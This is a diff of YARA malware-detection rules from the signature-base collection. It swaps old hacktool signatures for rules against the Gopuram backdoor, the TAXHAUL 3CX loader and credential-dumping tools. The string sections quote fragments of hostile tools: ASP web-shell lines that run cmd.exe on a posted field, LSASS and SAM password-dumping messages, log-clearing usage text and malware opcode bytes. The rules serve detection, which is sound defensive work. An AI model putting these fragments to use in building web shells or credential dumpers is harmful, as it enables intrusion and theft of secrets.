 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "4867214a3d96095d14aa8575f0adbb81a9381e6c"
-		logic_hash = "e43cefdb11df870f4732e74782ecefb94c0a4850c4aa994e4fbc940f523d2434"
-		score = 60
+		logic_hash = "9ad61dca5c945ed87642668e3b834b12c813af244437903a5abb5c69459b9456"
+		score = 70
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s0 = "ArtTrayHookDll.dll" fullword ascii
-		$s7 = "?TerminateHook@@YAXXZ" fullword ascii
+		$xc1 = { 4a 41 42 ?? 41 43 41 41 50 51 41 67 41 }
+		$xc2 = { 4a 00 41 00 42 00 ?? 00 41 00 43 00 41 00 41 00 50 00 51 00 41 00 67 00 41 }
+		$xc3 = { 4a 41 42 ?? 41 44 30 41 }
+		$xc4 = { 4a 00 41 00 42 00 ?? 00 41 00 44 00 30 00 41 }
 
 	condition:
-		all of them
+		filesize < 30MB and 1 of them
 }
-rule SIGNATURE_BASE_Sig_238_Eee
+rule SIGNATURE_BASE_MAL_Shellcode_Loader_Apr23
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file eee.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9d3ad3a9-0498-5ca3-ac19-f250cb10c4d3"
-		date = "2014-11-23"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1566-L1585"
+		description = "Detects Shellcode loader as seen being used by Gopuram backdoor"
+		author = "X__Junior (Nextron Systems)"
+		id = "363b67d6-9cac-513d-a545-1f256667bab8"
+		date = "2023-04-03"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/gopuram-backdoor-deployed-through-3cx-supply-chain-attack/109344/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_mal_gopuram_apr23.yar#L3-L18"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "236916ce2980c359ff1d5001af6dacb99227d9cb"
-		logic_hash = "b12c11f46125a33a2d7d9d02f25762c07b9d5088f70887c000b29e82a7921399"
-		score = 60
-		quality = 60
+		logic_hash = "e4e423158757c80b5e4e77f6a343323a87798c6697cf6a832aa01a146712b250"
+		score = 80
+		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "6ce5b6b4cdd6290d396465a1624d489c7afd2259a4d69b73c6b0ba0e5ad4e4ad"
+		hash2 = "b56279136d816a11cf4db9fc1b249da04b3fa3aef4ba709b20cdfbe572394812"
 
 	strings:
-		$s0 = "szj1230@yesky.com" fullword wide
-		$s3 = "C:\\Program Files\\DevStudio\\VB\\VB5.OLB" fullword ascii
-		$s4 = "MailTo:szj1230@yesky.com" fullword wide
-		$s5 = "Command1_Click" fullword ascii
-		$s7 = "software\\microsoft\\internet explorer\\typedurls" fullword wide
-		$s11 = "vb5chs.dll" fullword ascii
-		$s12 = "MSVBVM50.DLL" fullword ascii
+		$op1 = { 41 C1 CB 0D 0F BE 03 48 FF C3 44 03 D8 80 7B ?? 00 75 ?? 41 8D 04 13 3B C6 74 }
+		$op2 = { B9 49 F7 02 78 4C 8B E8 E8 ?? ?? ?? ?? B9 58 A4 53 E5 48 89 44 24 ?? E8 ?? ?? ?? ?? B9 10 E1 8A C3 48 8B F0 E8 ?? ?? ?? ?? B9 AF B1 5C 94 48 89 44 24 ?? E8 }
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Aspbackdoor_Asp4
+
+rule SIGNATURE_BASE_APT_MAL_Gopuram_Backdoor_Apr23 : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file asp4.txt"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7718aa71-fc0f-505c-a035-b78ae0438653"
-		date = "2014-11-23"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1587-L1607"
+		description = "Detects Gopuram backdoor"
+		author = "X__Junior (Nextron Systems)"
+		id = "3ae5ddcb-5601-5dca-85dd-0a4772577fae"
+		date = "2023-02-24"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/gopuram-backdoor-deployed-through-3cx-supply-chain-attack/109344/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_mal_gopuram_apr23.yar#L20-L41"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "faf991664fd82a8755feb65334e5130f791baa8c"
-		logic_hash = "dab19a2b92bbfe17cb860981d7bd5c3f3dd1a9e7c2ac5093fc4117f9205c1c27"
-		score = 60
+		logic_hash = "aa3dd1f35d27d23eb775410cceae81d5b767dc0f1636aac67f2d2e988a3ed995"
+		score = 80
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
+		hash1 = "beb775af5196f30e0ee021790a4978ca7a7ac2a7cf970a5a620ffeb89cc60b2c"
+		hash2 = "97b95b4a5461f950e712b82783930cb2a152ec0288c00a977983ca7788342df7"
 
 	strings:
-		$s0 = "system.dll" fullword ascii
-		$s2 = "set sys=server.CreateObject (\"system.contral\") " fullword ascii
-		$s3 = "Public Function reboot(atype As Variant)" fullword ascii
-		$s4 = "t& = ExitWindowsEx(1, atype)" ascii
-		$s5 = "atype=request(\"atype\") " fullword ascii
-		$s7 = "AceiveX dll" fullword ascii
-		$s8 = "Declare Function ExitWindowsEx Lib \"user32\" (ByVal uFlags As Long, ByVal " ascii
-		$s10 = "sys.reboot(atype)" fullword ascii
+		$x1 = "%s\\config\\TxR\\%s.TxR.0.regtrans-m" ascii
+		$xop = { D1 E8 33 C3 D1 EB A8 01 74 ?? 81 F3 25 A3 87 DE D1 E8 33 C3 D1 EB A8 01 74 ?? 81 F3 25 A3 87 DE D1 E8 33 C3 D1 EB A8 01 74 ?? 81 F3 25 A3 87 DE D1 E8 33 C3 D1 EB A8 01 74 ?? 81 F3 25 A3 87 DE }
+		$opa1 = { 48 89 44 24 ?? 45 33 C9 45 33 C0 33 D2 89 5C 24 ?? 48 89 74 24 ?? 48 89 5C 24 ?? 89 7C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C 24 ?? 4C 8D 4C 24 ?? 44 8D 43 }
+		$opa2 = { 48 89 B4 24 ?? ?? ?? ?? 44 8D 43 ?? 33 D2 48 89 BC 24 ?? ?? ?? ?? 4C 89 B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 45 33 C0 33 D2 8B F8 E8 ?? ?? ?? ?? 8D 4F ?? E8 ?? ?? ?? ?? 4C 8B 4C 24 ?? 44 8D 43 ?? 48 8B C8 8B D7 48 8B F0 44 8B F7 E8 ?? ?? ?? ?? 48 8B 4C 24 ?? E8  }
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and filesize < 2MB and pe.characteristics & pe.DLL and 1 of ( $x* ) ) or all of ( $opa* )
 }
-rule SIGNATURE_BASE_Aspfile1
+rule SIGNATURE_BASE_APT_NK_MAL_DLL_Apr23_1 : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file aspfile1.asp"
+		description = "Detects DLLs loaded by shellcode loader (6ce5b6b4cdd6290d396465a1624d489c7afd2259a4d69b73c6b0ba0e5ad4e4ad) (relation to Lazarus group)"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1b66dec0-22c8-5937-a0b2-22cbc68241ef"
-		date = "2014-11-23"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1609-L1627"
+		id = "c2abe266-0c21-51aa-9426-46a4f59df937"
+		date = "2023-04-03"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/gopuram-backdoor-deployed-through-3cx-supply-chain-attack/109344/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_mal_gopuram_apr23.yar#L43-L75"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "77b1e3a6e8f67bd6d16b7ace73dca383725ac0af"
-		logic_hash = "4968e44f807f8ffface65e21fd8684ccfaee281b4da10f5110482c3f26ccac26"
-		score = 60
+		logic_hash = "e0a8f3896c0119ce399e83fe3e565c66144693e84996aa3d01ca1b6315521782"
+		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
+		hash1 = "69dd140f45c3fa3aaa64c69f860cd3c74379dec37c46319d7805a29b637d4dbf"
+		hash3 = "bb1066c1ca53139dc5a2c1743339f4e6360d6fe4f2f3261d24fc28a12f3e2ab9"
+		hash4 = "dca33d6dacac0859ec2f3104485720fe2451e21eb06e676f4860ecc73a41e6f9"
+		hash5 = "fe948451df90df80c8028b969bf89ecbf501401e7879805667c134080976ce2e"
 
 	strings:
-		$s0 = "' -- check for a command that we have posted -- '" fullword ascii
-		$s1 = "szTempFile = \"C:\\\" & oFileSys.GetTempName( )" fullword ascii
-		$s5 = "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=gb2312\"><BODY>" fullword ascii
-		$s6 = "<input type=text name=\".CMD\" size=45 value=\"<%= szCMD %>\">" fullword ascii
-		$s8 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" fullword ascii
-		$s15 = "szCMD = Request.Form(\".CMD\")" fullword ascii
+		$x1 = "vG2eZ1KOeGd2n5fr" ascii fullword
+		$s1 = "Windows %d(%d)-%s" ascii fullword
+		$s2 = "auth_timestamp: " ascii fullword
+		$s3 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36" wide fullword
+		$op1 = { b8 c8 00 00 00 83 fb 01 44 0f 47 e8 41 8b c5 48 8b b4 24 e0 18 00 00 4c 8b a4 24 e8 18 00 00 48 8b 8d a0 17 00 00 48 33 cc }
+		$op2 = { 33 d2 46 8d 04 b5 00 00 00 00 66 0f 1f 44 00 00 49 63 c0 41 ff c0 8b 4c 84 70 31 4c 94 40 48 ff c2 }
+		$op3 = { 89 5c 24 50 0f 57 c0 c7 44 24 4c 04 00 00 00 c7 44 24 48 40 00 00 00 0f 11 44 24 60 0f 11 44 24 70 0f 11 45 80 0f 11 45 90 }
 
 	condition:
-		3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( 1 of ( $x* ) or 2 of them ) or ( $x1 and 1 of ( $s* ) or 3 of them )
 }
-rule SIGNATURE_BASE_Editserver
+rule SIGNATURE_BASE_APT_UNC4736_NK_MAL_TAXHAUL_3CX_Apr23_1 : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file EditServer.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "de6bf995-1c7c-561f-98df-e8748d5fb157"
-		date = "2014-11-23"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1629-L1651"
+		description = "Detects TAXHAUL (AKA TxRLoader) malware used in the 3CX compromise by UNC4736"
+		author = "Mandiant"
+		id = "25a80f98-03d6-59e6-84e6-6d847a6c591e"
+		date = "2023-03-04"
+		modified = "2023-12-05"
+		reference = "https://www.3cx.com/blog/news/mandiant-initial-results/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_mal_gopuram_apr23.yar#L77-L90"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "87b29c9121cac6ae780237f7e04ee3bc1a9777d3"
-		logic_hash = "6a8f6fcf8f4a0ea5ac114150d7becbd716be0bb40cd45fd5c76a4a8a328e5e40"
-		score = 60
+		logic_hash = "f67af611d0b3d96e4aaf7b3b5e49c1fb536e61a430b79ac0a0560ef3773ba140"
+		score = 80
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s0 = "%s Server.exe" fullword ascii
-		$s1 = "Service Port: %s" fullword ascii
-		$s2 = "The Port Must Been >0 & <65535" fullword ascii
-		$s8 = "3--Set Server Port" fullword ascii
-		$s9 = "The Server Password Exceeds 32 Characters" fullword ascii
-		$s13 = "Service Name: %s" fullword ascii
-		$s14 = "Server Password: %s" fullword ascii
-		$s17 = "Inject Process Name: %s" fullword ascii
-		$x1 = "WinEggDrop Shell Congirator" fullword ascii
+		$p00_0 = {410f45fe4c8d3d[4]eb??4533f64c8d3d[4]eb??4533f64c8d3d[4]eb}
+		$p00_1 = {4d3926488b01400f94c6ff90[4]41b9[4]eb??8bde4885c074}
 
 	condition:
-		5 of ( $s* ) or $x1
+		uint16( 0 ) == 0x5A4D and any of them
 }
-rule SIGNATURE_BASE_Sig_238_Letmein
+rule SIGNATURE_BASE_Windowscredentialeditor
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file letmein.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5dba055f-1928-534a-8d0e-11dda56d93b7"
-		date = "2014-11-23"
+		description = "Windows Credential Editor"
+		author = "Florian Roth"
+		id = "1542c6e4-36b2-5272-85d0-43226869b43e"
+		date = "2016-02-15"
 		modified = "2025-12-18"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1653-L1669"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L20-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "74d223a56f97b223a640e4139bb9b94d8faa895d"
-		logic_hash = "6cf454d11bc806b3a30c52b730994adb8d92613c92849162717f415e5681e417"
-		score = 60
+		logic_hash = "531a0bdc893d89b1c14deee11df95b430051cef07744a15b5d606e1c5378db97"
+		score = 90
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		threat_level = 10
 
 	strings:
-		$s1 = "Error get globalgroup memebers: NERR_InvalidComputer" fullword ascii
-		$s6 = "Error get users from server!" fullword ascii
-		$s7 = "get in nt by name and null" fullword ascii
-		$s16 = "get something from nt, hold by killusa." fullword ascii
+		$a = "extract the TGT session key"
+		$b = "Windows Credentials Editor"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Sig_238_Token
+rule SIGNATURE_BASE_HKTL_Amplia_Security_Tool : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file token.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9d0ac24b-2078-5455-8d9e-a642c71f7b2d"
-		date = "2014-11-23"
-		modified = "2025-12-18"
+		description = "Detects Amplia Security Tool like Windows Credential Editor"
+		author = "Florian Roth"
+		id = "4ad83f34-561d-53ce-9766-e21700354da7"
+		date = "2013-01-01"
+		modified = "2023-02-14"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1671-L1688"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L33-L53"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "c52bc6543d4281aa75a3e6e2da33cfb4b7c34b14"
-		logic_hash = "88d7086a48c6a2e3801db75565184b087e663e80e2364765072fc37a5549b8b5"
+		logic_hash = "7ca32d8df0011f23922c6566b28aa55b0756d5b67bf3db8908b206b1038bb1f2"
 		score = 60
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
+		nodeepdive = 1
 
 	strings:
-		$s0 = "Logon.exe" fullword ascii
-		$s1 = "Domain And User:" fullword ascii
-		$s2 = "PID=Get Addr$(): One" fullword ascii
-		$s3 = "Process " fullword ascii
-		$s4 = "psapi.dllK" fullword ascii
+		$a = "Amplia Security"
+		$c = "getlsasrvaddr.exe"
+		$d = "Cannot get PID of LSASS.EXE"
+		$e = "extract the TGT session key"
+		$f = "PPWDUMP_DATA"
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( 2 of them ) or 3 of them
 }
-rule SIGNATURE_BASE_Sig_238_TELNET
+rule SIGNATURE_BASE_Pwdump
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file TELNET.EXE from Windows ME"
-		author = "Florian Roth (Nextron Systems)"
-		id = "fae22e0f-2f69-5dc6-984c-2c07530ad11a"
-		date = "2014-11-23"
+		description = "PwDump 6 variant"
+		author = "Marc Stroebel"
+		id = "e557e548-53e8-5098-93d4-8e899384e67c"
+		date = "2014-04-24"
 		modified = "2025-12-18"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1690-L1706"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L56-L69"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "50d02d77dc6cc4dc2674f90762a2622e861d79b1"
-		logic_hash = "4e90d95b7c94933ed5c50f060840291540fc99de0173298b97d2c6ccbf75d26a"
-		score = 60
+		logic_hash = "a998d16f84e8689f182f6665ad165c6ff19e25d3e52acc10ca4cc6fe54ba354f"
+		score = 70
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "TELNET [host [port]]" fullword wide
-		$s2 = "TELNET.EXE" fullword wide
-		$s4 = "Microsoft(R) Windows(R) Millennium Operating System" fullword wide
-		$s14 = "Software\\Microsoft\\Telnet" fullword wide
+		$s5 = "Usage: %s [-x][-n][-h][-o output_file][-u user][-p password][-s share] machineNa"
+		$s6 = "Unable to query service status. Something is wrong, please manually check the st"
+		$s7 = "pwdump6 Version %s by fizzgig and the mighty group at foofus.net" fullword
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Snifferport
+rule SIGNATURE_BASE_Pscan_Portscan_1
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file snifferport.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5b903344-18d2-5d3d-be66-7260a5f3ea4b"
-		date = "2014-11-23"
+		description = "PScan - Port Scanner"
+		author = "F. Roth"
+		id = "54997776-644b-5a72-b08c-7174b7dc7f66"
+		date = "2016-02-15"
 		modified = "2025-12-18"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1708-L1725"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L71-L83"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d14133b5eaced9b7039048d0767c544419473144"
-		logic_hash = "361f1a55ed4bd5a7a5d01d346c4efd1b83e701363484282235b5aab18d3abe1a"
-		score = 60
+		logic_hash = "c624fcdf28506b551bf7b36883d95b279a7c56322337a0acafd91205659c92cc"
+		score = 50
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "iphlpapi.DLL" fullword ascii
-		$s5 = "ystem\\CurrentCorolSet\\" ascii
-		$s11 = "Port.TX" fullword ascii
-		$s12 = "32Next" fullword ascii
-		$s13 = "V1.2 B" fullword ascii
+		$a = "00050;0F0M0X0a0v0}0"
+		$b = "vwgvwgvP76"
+		$c = "Pr0PhOFyP"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Sig_238_Webget
+rule SIGNATURE_BASE_Hacktool_Samples
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file webget.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b03a2463-94fe-5050-8e3d-269101a03cda"
-		date = "2014-11-23"
+		description = "Hacktool"
+		author = "Florian Roth"
+		id = "ecacf84a-f66c-5c21-ae4b-fd9bfb5be384"
+		date = "2016-02-15"
 		modified = "2025-12-18"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1727-L1743"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L85-L119"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "36b5a5dee093aa846f906bbecf872a4e66989e42"
-		logic_hash = "958c465caddf6436b29042f1f1772e039d011d23ff13d91818a9d7ad21a2c750"
-		score = 60
-		quality = 85
+		logic_hash = "0064950d88eccbe670cd1dc70861d093c7f49f8f10e984aef4cfb4bcc94e4645"
+		score = 50
+		quality = 83
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Packed by exe32pack" ascii
-		$s1 = "GET A HTTP/1.0" fullword ascii
-		$s2 = " error " fullword ascii
-		$s13 = "Downloa" ascii
+		$a = "Unable to uninstall the fgexec service"
+		$b = "Unable to set socket to sniff"
+		$c = "Failed to load SAM functions"
+		$d = "Dump system passwords"
+		$e = "Error opening sam hive or not valid file"
+		$f = "Couldn't find LSASS pid"
+		$g = "samdump.dll"
+		$h = "WPEPRO SEND PACKET"
+		$i = "WPE-C1467211-7C89-49c5-801A-1D048E4014C4"
+		$j = "Usage: unshadow PASSWORD-FILE SHADOW-FILE"
+		$k = "arpspoof\\Debug"
+		$l = "Success: The log has been cleared"
+		$m = "clearlogs [\\\\computername"
+		$n = "DumpUsers 1."
+		$o = "dictionary attack with specified dictionary file"
+		$p = "by Objectif Securite"
+		$q = "objectif-securite"
+		$r = "Cannot query LSA Secret on remote host"
+		$s = "Cannot write to process memory on remote host"
+		$t = "Cannot start PWDumpX service on host"
+		$u = "usage: %s <system hive> <security hive>"
+		$v = "username:domainname:LMhash:NThash"
+		$w = "<server_name_or_ip> | -f <server_list_file> [username] [password]"
+		$x = "Impersonation Tokens Available"
+		$y = "failed to parse pwdump format string"
+		$z = "Dumping password"
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Xyzcmd_Zip_Folder_Xyzcmd
+rule SIGNATURE_BASE_Fierce2
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file XYZCmd.exe"
+		description = "This signature detects the Fierce2 domain scanner"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c3d70b93-1d53-5403-bd22-d1e4bad5042b"
-		date = "2014-11-23"
+		id = "08a72151-48c2-513b-995f-be0d5acba7dd"
+		date = "2014-01-07"
 		modified = "2025-12-18"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1745-L1761"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L123-L135"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "bbea5a94950b0e8aab4a12ad80e09b630dd98115"
-		logic_hash = "ad0e8f964c7be376236b50ea370de3e433fa9e7b043663d8f32fad06997056ea"
+		logic_hash = "05502827dd5d1903507fd1e176d518516a5c1965fb4e51ea26b1a05eb0dce3d2"
 		score = 60
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Executes Command Remotely" fullword wide
-		$s2 = "XYZCmd.exe" fullword wide
-		$s6 = "No Client Software" fullword wide
-		$s19 = "XYZCmd V1.0 For NT S" fullword ascii
+		$s1 = "$tt_xml->process( 'end_domainscan.tt', $end_domainscan_vars,"
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Aspack_Chinese
+rule SIGNATURE_BASE_Ncrack
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file ASPack Chinese.ini"
+		description = "This signature detects the Ncrack brute force tool"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ac821117-7534-5dec-9477-25be87361900"
-		date = "2014-11-23"
+		id = "c1c56ee9-7f76-5440-b0e0-86e372c53340"
+		date = "2014-01-07"
 		modified = "2025-12-18"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1763-L1780"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L137-L149"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "02a9394bc2ec385876c4b4f61d72471ac8251a8e"
-		logic_hash = "98b3af76986cd41190612a2fdfbd9ba48f102456897f4acaedd89a40ab5a582a"
+		logic_hash = "a42bfaefb873a10821bcc06db109d8ab20daa8c8ac0b6cfb245d2ee339f318bb"
 		score = 60
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "= Click here if you want to get your registered copy of ASPack" fullword ascii
-		$s1 = ";  For beginning of translate - copy english.ini into the yourlanguage.ini" fullword ascii
-		$s2 = "E-Mail:                      shinlan@km169.net" fullword ascii
-		$s8 = ";  Please, translate text only after simbol '='" fullword ascii
-		$s19 = "= Compress with ASPack" fullword ascii
+		$s1 = "NcrackOutputTable only supports adding up to 4096 to a cell via"
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Aspbackdoor_EDIR
+rule SIGNATURE_BASE_Sqlmap
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file EDIR.ASP"
+		description = "This signature detects the SQLMap SQL injection tool"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0895091a-b620-5746-8245-d44716ec2bbe"
-		date = "2014-11-23"
+		id = "55a72fe6-f82d-5d55-842f-5d7e1cfcc9fa"
+		date = "2014-01-07"
 		modified = "2025-12-18"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1782-L1799"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L151-L163"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "03367ad891b1580cfc864e8a03850368cbf3e0bb"
-		logic_hash = "be7d956333107a57a0fd86c69fc9eabcd3d9daf3f66385c44ba246fc2000dc4d"
+		logic_hash = "9c248c856c3d91a282012489b53dc9e15569e1bb1a5c9f5e3c7938f7ce0c3157"
 		score = 60
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "response.write \"<a href='index.asp'>" fullword ascii
-		$s3 = "if Request.Cookies(\"password\")=\"" ascii
-		$s6 = "whichdir=server.mappath(Request(\"path\"))" fullword ascii
-		$s7 = "Set fs = CreateObject(\"Scripting.FileSystemObject\")" fullword ascii
-		$s19 = "whichdir=Request(\"path\")" fullword ascii
+		$s1 = "except SqlmapBaseException, ex:"
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Bypassfirewall_Zip_Folder_Ie
+rule SIGNATURE_BASE_HKTL_Portscanner_Simple_Jan14
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file Ie.dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7bd10fa1-be2d-5882-b4c7-b696612343e5"
-		date = "2014-11-23"
+		description = "Auto-generated rule on file PortScanner.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
